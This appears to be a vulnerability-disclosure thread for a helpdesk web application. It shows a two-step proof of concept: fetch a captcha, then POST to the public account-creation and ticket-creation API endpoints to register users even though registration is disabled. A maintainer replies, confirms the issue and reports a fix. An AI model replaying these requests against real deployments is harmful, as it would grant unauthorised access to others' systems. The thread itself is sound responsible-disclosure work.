Attacker can register a user in spite of the Allow User Registration is disable by default.

  1. Go to /captcha, get the captcha value and cookie. alt text
  2. Send POST request to (/api/v1/public/account/create) with the value of captcha and cookie in step 1.
    //POST HOST/api/v1/public/account/create
    "user": {
        "fullname": "uname",
        "email": "",
        "password": "passwd"
    "captcha": "captcha"

alt text

  1. Register successfuly.


Same POC with endpoint Create New Ticket(/api/v1/public/tickets/create)

{"user":{"fullname":"tpa tpa2","email":""},"ticket":{"subject":"123","issue":"123"},"captcha":"Dazr"}


Attacker can register a user and get inside the dashboard.

Can you try the same request once you log out of the app as yourself? It's using your permissions since you're logged in.

a year ago


Actually, I see the issue. I will publish a fix soon.

Confirm the bug has been fixed.

